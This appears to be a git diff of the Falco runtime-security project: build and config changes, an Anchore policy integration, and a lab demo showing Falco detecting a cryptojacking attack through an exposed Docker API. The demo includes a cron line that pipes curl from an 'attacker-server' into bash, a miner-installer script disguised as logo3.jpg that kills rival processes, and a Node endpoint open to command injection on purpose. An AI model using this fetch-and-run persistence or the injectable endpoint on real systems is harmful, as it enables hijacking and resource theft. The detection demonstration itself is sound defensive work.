+ && rm -rf /usr/bin/llc \
+ && ln -s /usr/bin/clang-7 /usr/bin/clang \
+ && ln -s /usr/bin/llc-7 /usr/bin/llc

 RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
 && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
@@ -44,7 +47,20 @@ RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public |
 && apt-get clean \
 && rm -rf /var/lib/apt/lists/*

-RUN ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
+# Some base images have an empty /lib/modules by default
+# If it's not empty, docker build will fail instead of
+# silently overwriting the existing directory
+RUN rm -df /lib/modules \
+ && ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
+
+# debian:unstable head contains binutils 2.31, which generates
+# binaries that are incompatible with kernels < 4.16. So manually
+# forcibly install binutils 2.30-22 instead.
+RUN curl -s -o binutils_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils_2.30-22_amd64.deb \
+ && curl -s -o libbinutils_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/libbinutils_2.30-22_amd64.deb \
+ && curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+ && curl -s -o binutils-common_2.30-22_amd64.deb http://snapshot.debian.org/archive/debian/20180622T211149Z/pool/main/b/binutils/binutils-common_2.30-22_amd64.deb \
+ && dpkg -i *binutils*.deb

 COPY ./docker-entrypoint.sh /

--- a/docker/stable/docker-entrypoint.sh
+++ b/docker/stable/docker-entrypoint.sh
@@ -11,7 +11,7 @@ if [[ -z "${SYSDIG_SKIP_LOAD}" ]]; then
        ln -s $SYSDIG_HOST_ROOT/usr/src/$i /usr/src/$i
    done

-    /usr/bin/sysdig-probe-loader
+    /usr/bin/falco-probe-loader
 fi

 exec "$@"
--- a/examples/bad-mount-cryptomining/README.md
+++ b/examples/bad-mount-cryptomining/README.md
@@ -0,0 +1,117 @@
+# Demo of Falco Detecting Cryptomining Exploit
+
+## Introduction
+
+Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Sysdig Falco.
+
+Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
+
+## Requirements
+
+In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
+
+## Example architecture
+
+The example consists of the following:
+
+* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
+* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker.
+* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
+
+All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
+
+A separate container is created to launch the attack:
+
+* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
+
+## Example Walkthrough
+
+### Start everything using docker-compose
+
+To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
+
+Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
+
+You will see fairly verbose output from dockerd:
+
+```
+host-machine_1     | crond: crond (busybox 1.27.2) started, log level 6
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
+host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
+```
+
+When you see log output like the following, you know that falco is started and ready:
+
+```
+falco_1            | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
+falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
+falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
+```
+
+### Launch malicious container
+
+To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
+
+The script `launch_malicious_container.sh` performs the necessary POSTs:
+
+* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
+* `http://localhost:2375/containers/create?&name=docker123321-mysql`
+* `http://localhost:2375/containers/docker123321-mysql/start`
+
+Run the script via `bash launch_malicious_container.sh`.
+
+### Examine cron output as malicious software is installed & run
+
+`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
+
+```
+* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
+```
+
+It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg))  from `attacker-server` and run it.
+
+You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
+
+```
+CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS               NAMES
+68ed578bd034        alpine:latest       "/bin/sh -c 'echo '*…"   About a minute ago   Up About a minute                       docker123321-mysql
+```
+
+Once the cron job runs, you will see output like the following:
+
+```
+host-machine_1     | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
+host-machine_1     | ***Checking for existing Miner program
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
+host-machine_1     | ***Killing competing Miner programs
+host-machine_1     | ***Reinstalling cron job to run Miner program
+host-machine_1     | ***Configuring Miner program
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
+attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
+host-machine_1     | ***Configuring system for Miner program
+host-machine_1     | vm.nr_hugepages = 9
+host-machine_1     | ***Running Miner program
+host-machine_1     | ***Ensuring Miner program is alive
+host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
+host-machine_1     | /var/tmp
+host-machine_1     | runing.....
+host-machine_1     | ***Ensuring Miner program is alive
+host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
+host-machine_1     | /var/tmp
+host-machine_1     | runing.....
+```
+
+### Observe Falco detecting malicious activity
+
+To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
+
+```
+falco_1            | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
+falco_1            | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
+```
+
+### Cleanup
+
+To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.
+
--- a/examples/bad-mount-cryptomining/attacker-nginx.conf
+++ b/examples/bad-mount-cryptomining/attacker-nginx.conf
@@ -0,0 +1,14 @@
+server {
+    listen       8220;
+    server_name  localhost;
+
+    location / {
+        root   /usr/share/nginx/html;
+        index  index.html index.htm;
+    }
+
+    error_page   500 502 503 504  /50x.html;
+    location = /50x.html {
+        root   /usr/share/nginx/html;
+    }
+}
--- a/examples/bad-mount-cryptomining/attacker_files/config_1.json
+++ b/examples/bad-mount-cryptomining/attacker_files/config_1.json
@@ -0,0 +1 @@
+{"config": "some-bitcoin-miner-config-goes-here"}
--- a/examples/bad-mount-cryptomining/attacker_files/logo3.jpg
+++ b/examples/bad-mount-cryptomining/attacker_files/logo3.jpg
@@ -0,0 +1,64 @@
+#!/bin/sh
+echo "***Checking for existing Miner program"
+ps -fe|grep jaav |grep -v grep
+if [ $? -eq 0 ]
+then
+pwd
+else
+
+echo "***Killing competing Miner programs"
+rm -rf /var/tmp/ysjswirmrm.conf
+rm -rf /var/tmp/sshd
+ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
+ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
+
+echo "***Reinstalling cron job to run Miner program"
+crontab -r || true && \
+echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
+crontab /tmp/cron || true && \
+rm -rf /tmp/cron || true
+
+echo "***Configuring Miner program"
+curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
+curl -so /var/tmp/jaav http://attacker-server:8220/minerd
+chmod 777 /var/tmp/jaav
+cd /var/tmp
+
+echo "***Configuring system for Miner program"
+cd /var/tmp
+proc=`grep -c ^processor /proc/cpuinfo`
+cores=$(($proc+1))
+num=$(($cores*3))
+/sbin/sysctl -w vm.nr_hugepages=$num
+
+echo "***Running Miner program"
+nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
+fi
+
+echo "***Ensuring Miner program is alive"
+ps -fe|grep jaav |grep -v grep
+if [ $? -eq 0 ]
+then
+pwd
+else
+
+echo "***Reconfiguring Miner program"
+curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
+curl -so /var/tmp/jaav http://attacker-server:8220/minerd
+chmod 777 /var/tmp/jaav
+cd /var/tmp
+
+echo "***Reconfiguring system for Miner program"
+proc=`grep -c ^processor /proc/cpuinfo`
+cores=$(($proc+1))
+num=$(($cores*3))
+/sbin/sysctl -w vm.nr_hugepages=$num
+
+echo "***Restarting Miner program"
+nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
+fi
+echo "runing....."
--- a/examples/bad-mount-cryptomining/attacker_files/minerd
+++ b/examples/bad-mount-cryptomining/attacker_files/minerd
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+while true; do
+      echo "Mining bitcoins..."
+      sleep 60
+done
+
+      
--- a/examples/bad-mount-cryptomining/demo.yml
+++ b/examples/bad-mount-cryptomining/demo.yml
@@ -0,0 +1,41 @@
+version: '3'
+
+volumes:
+  host-filesystem:
+  docker-socket:
+
+services:
+  host-machine:
+    privileged: true
+    build:
+      context: ${PWD}/host-machine
+      dockerfile: ${PWD}/host-machine/Dockerfile
+    volumes:
+      - host-filesystem:/etc
+      - docker-socket:/var/run
+    ports:
+      - "2375:2375"
+    depends_on:
+      - "falco"
+
+  attacker-server:
+    image: nginx:latest
+    ports:
+      - "8220:8220"
+    volumes:
+      - ${PWD}/attacker_files:/usr/share/nginx/html
+      - ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
+    depends_on:
+      - "falco"      
+  
+  falco:
+    image: sysdig/falco:latest
+    privileged: true
+    volumes:
+      - docker-socket:/host/var/run
+      - /dev:/host/dev
+      - /proc:/host/proc:ro
+      - /boot:/host/boot:ro
+      - /lib/modules:/host/lib/modules:ro
+      - /usr:/host/usr:ro
+    tty: true
--- a/examples/bad-mount-cryptomining/docker123321-mysql-container.json
+++ b/examples/bad-mount-cryptomining/docker123321-mysql-container.json
@@ -0,0 +1,7 @@
+{
+    "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
+    "Image": "alpine:latest",
+    "HostConfig": {
+	"Binds": ["/etc:/mnt/etc"]
+    }
+}
--- a/examples/bad-mount-cryptomining/host-machine/Dockerfile
+++ b/examples/bad-mount-cryptomining/host-machine/Dockerfile
@@ -0,0 +1,12 @@
+FROM docker:stable-dind
+
+RUN set -ex \
+    && apk add --no-cache \
+    bash curl
+
+COPY start-cron-and-dind.sh /usr/local/bin
+
+ENTRYPOINT ["start-cron-and-dind.sh"]
+CMD []
+
+
--- a/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh
+++ b/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+# Start docker-in-docker, but backgrounded with its output still going
+# to stdout/stderr.
+dockerd-entrypoint.sh &
+
+# Start cron in the foreground with a moderate level of debugging to
+# see job output.
+crond -f -d 6
+
+
--- a/examples/bad-mount-cryptomining/launch_malicious_container.sh
+++ b/examples/bad-mount-cryptomining/launch_malicious_container.sh
@@ -0,0 +1,14 @@
+#!/bin/sh
+
+echo "Pulling alpine:latest image to docker-in-docker instance"
+curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
+
+echo "Creating container mounting /etc from host-machine"
+curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
+
+echo "Running container mounting /etc from host-machine"
+curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'
+
+
+
+
--- a/examples/nodejs-bad-rest-api/demo.yml
+++ b/examples/nodejs-bad-rest-api/demo.yml
@@ -1,11 +1,9 @@
-# Owned by software vendor, serving install-software.sh.
 express_server:
  container_name: express_server
  image: node:latest
-  working_dir: /usr/src/app
-  command: bash -c "npm install && node server.js"
+  command: bash -c "apt-get -y update && apt-get -y install runit && npm install && runsv /usr/src/app"
  ports:
-    - "8080:8080"
+    - "8181:8181"
  volumes:
        - ${PWD}:/usr/src/app

@@ -20,5 +18,4 @@ falco:
    - /boot:/host/boot:ro
    - /lib/modules:/host/lib/modules:ro
    - /usr:/host/usr:ro
-    - ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
  tty: true
--- a/examples/nodejs-bad-rest-api/run
+++ b/examples/nodejs-bad-rest-api/run
@@ -0,0 +1,2 @@
+#!/bin/sh
+node server.js
--- a/examples/nodejs-bad-rest-api/server.js
+++ b/examples/nodejs-bad-rest-api/server.js
@@ -2,19 +2,19 @@ var express    = require('express');        // call express
 var app        = express();                 // define our app using express
 var child_process = require('child_process');

-var port = process.env.PORT || 8080;        // set our port
+var port = process.env.PORT || 8181;        // set our port

 // ROUTES FOR OUR API
 // =============================================================================
 var router = express.Router();              // get an instance of the express Router

-// test route to make sure everything is working (accessed at GET http://localhost:8080/api)
+// test route to make sure everything is working (accessed at GET http://localhost:8181/api)
 router.get('/', function(req, res) {
    res.json({ message: 'API available'});
 });

 router.get('/exec/:cmd', function(req, res) {
-    var ret = child_process.spawnSync(req.params.cmd);
+    var ret = child_process.spawnSync(req.params.cmd, { shell: true});
    res.send(ret.stdout);
 });

--- a/falco.yaml
+++ b/falco.yaml
@@ -1,9 +1,28 @@
-# File containing Falco rules, loaded at startup.
-rules_file: /etc/falco_rules.yaml
+# File(s) or Directories containing Falco rules, loaded at startup.
+# The name "rules_file" is only for backwards compatibility.
+# If the entry is a file, it will be read directly. If the entry is a directory,
+# every file in that directory will be read, in alphabetical order.
+#
+# falco_rules.yaml ships with the falco package and is overridden with
+# every new software version. falco_rules.local.yaml is only created
+# if it doesn't exist. If you want to customize the set of rules, add
+# your customizations to falco_rules.local.yaml.
+#
+# The files will be read in the order presented here, so make sure if
+# you have overrides they appear in later files.
+rules_file:
+ - /etc/falco/falco_rules.yaml
+ - /etc/falco/falco_rules.local.yaml
+ - /etc/falco/rules.d

 # Whether to output events in json or text
 json_output: false

+# When using json output, whether or not to include the "output" property
+# itself (e.g. "File below a known binary directory opened for writing
+# (user=root ....") in the json output.
+json_include_output_property: true
+
 # Send information logs to stderr and/or syslog Note these are *not* security
 # notification logs! These are just Falco lifecycle (and possibly error) logs.
 log_stderr: true
@@ -15,6 +34,16 @@ log_syslog: true
 # "alert", "critical", "error", "warning", "notice", "info", "debug".
 log_level: info

+# Minimum rule priority level to load and run. All rules having a
+# priority more severe than this level will be loaded/run.  Can be one
+# of "emergency", "alert", "critical", "error", "warning", "notice",
+# "info", "debug".
+priority: debug
+
+# Whether or not output to any of the output channels below is
+# buffered. Defaults to true
+buffered_outputs: true
+
 # A throttling mechanism implemented as a token bucket limits the
 # rate of falco notifications. This throttling is controlled by the following configuration
 # options:
@@ -37,8 +66,17 @@ outputs:
 syslog_output:
  enabled: true

+# If keep_alive is set to true, the file will be opened once and
+# continuously written to, with each output message on its own
+# line. If keep_alive is set to false, the file will be re-opened
+# for each output message.
+#
+# Also, the file will be closed and reopened if falco is signaled with
+# SIGUSR1.
+
 file_output:
  enabled: false
+  keep_alive: false
  filename: ./events.txt

 stdout_output:
@@ -49,7 +87,17 @@ stdout_output:
 #         program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
 #   - logging (alternate method than syslog):
 #         program: logger -t falco-test
+#   - send over a network connection:
+#         program: nc host.example.com 80

+# If keep_alive is set to true, the program will be started once and
+# continuously written to, with each output message on its own
+# line. If keep_alive is set to false, the program will be re-spawned
+# for each output message.
+#
+# Also, the program will be closed and reopened if falco is signaled with
+# SIGUSR1.
 program_output:
  enabled: false
+  keep_alive: false
  program: mail -s "Falco Notification" someone@example.com
--- a/integrations/anchore-falco/Dockerfile
+++ b/integrations/anchore-falco/Dockerfile
@@ -0,0 +1,13 @@
+FROM python:3-stretch
+
+RUN pip install pipenv
+
+WORKDIR /app
+
+ADD Pipfile /app/Pipfile
+ADD Pipfile.lock /app/Pipfile.lock
+RUN pipenv install --system --deploy
+
+ADD . /app
+
+CMD ["python", "main.py"]
--- a/integrations/anchore-falco/Pipfile
+++ b/integrations/anchore-falco/Pipfile
@@ -0,0 +1,16 @@
+[[source]]
+url = "https://pypi.python.org/simple"
+verify_ssl = true
+name = "pypi"
+
+[dev-packages]
+doublex-expects = "==0.7.0rc2"
+doublex = "*"
+mamba = "*"
+expects = "*"
+
+[packages]
+requests = "*"
+
+[requires]
+python_version = "3.6"
--- a/integrations/anchore-falco/Pipfile.lock
+++ b/integrations/anchore-falco/Pipfile.lock
@@ -0,0 +1,156 @@
+{
+    "_meta": {
+        "hash": {
+            "sha256": "f2737a14e8f562cf355e13ae09f1eed0f80415effd2aa01b86125e94523da345"
+        },
+        "pipfile-spec": 6,
+        "requires": {
+            "python_version": "3.6"
+        },
+        "sources": [
+            {
+                "name": "pypi",
+                "url": "https://pypi.python.org/simple",
+                "verify_ssl": true
+            }
+        ]
+    },
+    "default": {
+        "certifi": {
+            "hashes": [
+                "sha256:13e698f54293db9f89122b0581843a782ad0934a4fe0172d2a980ba77fc61bb7",
+                "sha256:9fa520c1bacfb634fa7af20a76bcbd3d5fb390481724c597da32c719a7dca4b0"
+            ],
+            "version": "==2018.4.16"
+        },
+        "chardet": {
+            "hashes": [
+                "sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae",
+                "sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691"
+            ],
+            "version": "==3.0.4"
+        },
+        "idna": {
+            "hashes": [
+                "sha256:156a6814fb5ac1fc6850fb002e0852d56c0c8d2531923a51032d1b70760e186e",
+                "sha256:684a38a6f903c1d71d6d5fac066b58d7768af4de2b832e426ec79c30daa94a16"
+            ],
+            "version": "==2.7"
+        },
+        "requests": {
+            "hashes": [
+                "sha256:63b52e3c866428a224f97cab011de738c36aec0185aa91cfacd418b5d58911d1",
+                "sha256:ec22d826a36ed72a7358ff3fe56cbd4ba69dd7a6718ffd450ff0e9df7a47ce6a"
+            ],
+            "index": "pypi",
+            "version": "==2.19.1"
+        },
+        "urllib3": {
+            "hashes": [
+                "sha256:a68ac5e15e76e7e5dd2b8f94007233e01effe3e50e8daddf69acfd81cb686baf",
+                "sha256:b5725a0bd4ba422ab0e66e89e030c806576753ea3ee08554382c14e685d117b5"
+            ],
+            "version": "==1.23"
+        }
+    },
+    "develop": {
+        "args": {
+            "hashes": [
+                "sha256:a785b8d837625e9b61c39108532d95b85274acd679693b71ebb5156848fcf814"
+            ],
+            "version": "==0.1.0"
+        },
+        "clint": {
+            "hashes": [
+                "sha256:05224c32b1075563d0b16d0015faaf9da43aa214e4a2140e51f08789e7a4c5aa"
+            ],
+            "version": "==0.5.1"
+        },
+        "coverage": {
+            "hashes": [
+                "sha256:03481e81d558d30d230bc12999e3edffe392d244349a90f4ef9b88425fac74ba",
+                "sha256:0b136648de27201056c1869a6c0d4e23f464750fd9a9ba9750b8336a244429ed",
+                "sha256:104ab3934abaf5be871a583541e8829d6c19ce7bde2923b2751e0d3ca44db60a",
+                "sha256:15b111b6a0f46ee1a485414a52a7ad1d703bdf984e9ed3c288a4414d3871dcbd",
+                "sha256:198626739a79b09fa0a2f06e083ffd12eb55449b5f8bfdbeed1df4910b2ca640",
+                "sha256:1c383d2ef13ade2acc636556fd544dba6e14fa30755f26812f54300e401f98f2",
+                "sha256:28b2191e7283f4f3568962e373b47ef7f0392993bb6660d079c62bd50fe9d162",
+                "sha256:2eb564bbf7816a9d68dd3369a510be3327f1c618d2357fa6b1216994c2e3d508",
+                "sha256:337ded681dd2ef9ca04ef5d93cfc87e52e09db2594c296b4a0a3662cb1b41249",
+                "sha256:3a2184c6d797a125dca8367878d3b9a178b6fdd05fdc2d35d758c3006a1cd694",
+                "sha256:3c79a6f7b95751cdebcd9037e4d06f8d5a9b60e4ed0cd231342aa8ad7124882a",
+                "sha256:3d72c20bd105022d29b14a7d628462ebdc61de2f303322c0212a054352f3b287",
+                "sha256:3eb42bf89a6be7deb64116dd1cc4b08171734d721e7a7e57ad64cc4ef29ed2f1",
+                "sha256:4635a184d0bbe537aa185a34193898eee409332a8ccb27eea36f262566585000",
+                "sha256:56e448f051a201c5ebbaa86a5efd0ca90d327204d8b059ab25ad0f35fbfd79f1",
+                "sha256:5a13ea7911ff5e1796b6d5e4fbbf6952381a611209b736d48e675c2756f3f74e",
+                "sha256:69bf008a06b76619d3c3f3b1983f5145c75a305a0fea513aca094cae5c40a8f5",
+                "sha256:6bc583dc18d5979dc0f6cec26a8603129de0304d5ae1f17e57a12834e7235062",
+                "sha256:701cd6093d63e6b8ad7009d8a92425428bc4d6e7ab8d75efbb665c806c1d79ba",
+                "sha256:7608a3dd5d73cb06c531b8925e0ef8d3de31fed2544a7de6c63960a1e73ea4bc",
+                "sha256:76ecd006d1d8f739430ec50cc872889af1f9c1b6b8f48e29941814b09b0fd3cc",
+                "sha256:7aa36d2b844a3e4a4b356708d79fd2c260281a7390d678a10b91ca595ddc9e99",
+                "sha256:7d3f553904b0c5c016d1dad058a7554c7ac4c91a789fca496e7d8347ad040653",
+                "sha256:7e1fe19bd6dce69d9fd159d8e4a80a8f52101380d5d3a4d374b6d3eae0e5de9c",
+                "sha256:8c3cb8c35ec4d9506979b4cf90ee9918bc2e49f84189d9bf5c36c0c1119c6558",
+                "sha256:9d6dd10d49e01571bf6e147d3b505141ffc093a06756c60b053a859cb2128b1f",
+                "sha256:9e112fcbe0148a6fa4f0a02e8d58e94470fc6cb82a5481618fea901699bf34c4",
+                "sha256:ac4fef68da01116a5c117eba4dd46f2e06847a497de5ed1d64bb99a5fda1ef91",
+                "sha256:b8815995e050764c8610dbc82641807d196927c3dbed207f0a079833ffcf588d",
+                "sha256:be6cfcd8053d13f5f5eeb284aa8a814220c3da1b0078fa859011c7fffd86dab9",
+                "sha256:c1bb572fab8208c400adaf06a8133ac0712179a334c09224fb11393e920abcdd",
+                "sha256:de4418dadaa1c01d497e539210cb6baa015965526ff5afc078c57ca69160108d",
+                "sha256:e05cb4d9aad6233d67e0541caa7e511fa4047ed7750ec2510d466e806e0255d6",
+                "sha256:e4d96c07229f58cb686120f168276e434660e4358cc9cf3b0464210b04913e77",
+                "sha256:f3f501f345f24383c0000395b26b726e46758b71393267aeae0bd36f8b3ade80",
+                "sha256:f8a923a85cb099422ad5a2e345fe877bbc89a8a8b23235824a93488150e45f6e"
+            ],
+            "version": "==4.5.1"
+        },
+        "doublex": {
+            "hashes": [
+                "sha256:062af49d9e4148bc47b7512d3fdc8e145dea4671d074ffd54b2464a19d3757ab"
+            ],
+            "index": "pypi",
+            "version": "==1.8.4"
+        },
+        "doublex-expects": {
+            "hashes": [
+                "sha256:5421bd92319c77ccc5a81d595d06e9c9f7f670de342b33e8007a81e70f9fade8"
+            ],
+            "index": "pypi",
+            "version": "==0.7.0rc2"
+        },
+        "expects": {
+            "hashes": [
+                "sha256:37538d7b0fa9c0d53e37d07b0e8c07d89754d3deec1f0f8ed1be27f4f10363dd"
+            ],
+            "index": "pypi",
+            "version": "==0.8.0"
+        },
+        "mamba": {
+            "hashes": [
+                "sha256:63e70a8666039cf143a255000e23f29be4ea4b5b8169f2b053f94eb73a2ea9e2"
+            ],
+            "index": "pypi",
+            "version": "==0.9.3"
+        },
+        "pyhamcrest": {
+            "hashes": [
+                "sha256:6b672c02fdf7470df9674ab82263841ce8333fb143f32f021f6cb26f0e512420",
+                "sha256:7a4bdade0ed98c699d728191a058a60a44d2f9c213c51e2dd1e6fb42f2c6128a",
+                "sha256:8ffaa0a53da57e89de14ced7185ac746227a8894dbd5a3c718bf05ddbd1d56cd",
+                "sha256:bac0bea7358666ce52e3c6c85139632ed89f115e9af52d44b3c36e0bf8cf16a9",
+                "sha256:f30e9a310bcc1808de817a92e95169ffd16b60cbc5a016a49c8d0e8ababfae79"
+            ],
+            "version": "==1.9.0"
+        },
+        "six": {
+            "hashes": [
+                "sha256:70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9",
+                "sha256:832dc0e10feb1aa2c68dcc57dbb658f1c7e65b9b61af69048abc87a2db00a0eb"
+            ],
+            "version": "==1.11.0"
+        }
+    }
+}
--- a/integrations/anchore-falco/README.md
+++ b/integrations/anchore-falco/README.md
@@ -0,0 +1,89 @@
+# Create Falco rule from Anchore policy result
+
+This integration creates a rule for Sysdig Falco based on Anchore policy result.
+So that when we will try to run an image which has a ```stop``` final action result
+in Anchore, Falco will alert us.
+
+## Getting started
+
+### Prerequisites
+
+For running this integration you will need:
+
+* Python 3.6
+* pipenv
+* An [anchore-engine](https://github.com/anchore/anchore-engine) running
+
+### Configuration
+
+This integration uses the [same environment variables that anchore-cli](https://github.com/anchore/anchore-cli#configuring-the-anchore-cli):
+
+* ANCHORE_CLI_USER: The user used to conect to anchore-engine. By default is ```admin```
+* ANCHORE_CLI_PASS: The password used to connect to anchore-engine.
+* ANCHORE_CLI_URL: The url where anchore-engine listens. Make sure does not end with a slash. By default is ```http://localhost:8228/v1```
+* ANCHORE_CLI_SSL_VERIFY: Flag for enabling if HTTP client verifies SSL. By default is ```true```
+
+### Running
+
+This is a Python program which generates a Falco rule based on anchore-engine
+information:
+
+```
+pipenv run python main.py
+```
+
+And this will output something like:
+
+
+```yaml
+- macro: anchore_stop_policy_evaluation_containers
+  condition: container.image.id in ("8626492fecd368469e92258dfcafe055f636cb9cbc321a5865a98a0a6c99b8dd", "e86d9bb526efa0b0401189d8df6e3856d0320a3d20045c87b4e49c8a8bdb22c1")
+
+- rule: Run Anchore Containers with Stop Policy Evaluation
+  desc: Detect containers which does not receive a positive Policy Evaluation from Anchore Engine.
+
+  condition: evt.type=execve and proc.vpid=1 and container and anchore_stop_policy_evaluation_containers
+  output: A stop policy evaluation container from anchore has started (%container.info image=%container.image)
+  priority: INFO
+  tags: [container]
+```
+
+You can save that output to ```/etc/falco/rules.d/anchore-integration-rules.yaml```
+and Falco will start checking this rule.
+
+As long as information in anchore-engine can change, it's a good idea to run this
+integration **periodically** and keep the rule synchronized with anchore-engine
+policy evaluation result.
+
+## Tests
+
+As long as there are contract tests with anchore-engine, it needs a working
+anchore-engine and its environment variables.
+
+```
+pipenv install -d
+pipenv run mamba --format=documentation
+```
+
+## Docker support
+
+### Build the image
+
+```
+docker build -t sysdig/anchore-falco .
+```
+
+### Running the image
+
+An image exists on DockerHub, its name is ```sysdig/anchore-falco```.
+
+So you can run directly with Docker:
+
+```
+docker run --rm -e ANCHORE_CLI_USER=<user-for-custom-anchore-engine> \
+                -e ANCHORE_CLI_PASS=<passsword-for-user-for-custom-anchore-engine> \
+                -e ANCHORE_CLI_URL=http://<custom-anchore-engine-host>:8228/v1 \
+                sysdig/anchore-falco
+```
+
+And this will output the Falco rule based on *custom-anchore-engine-host*.
--- a/integrations/anchore-falco/actions.py
+++ b/integrations/anchore-falco/actions.py
@@ -0,0 +1,25 @@
+import string
+
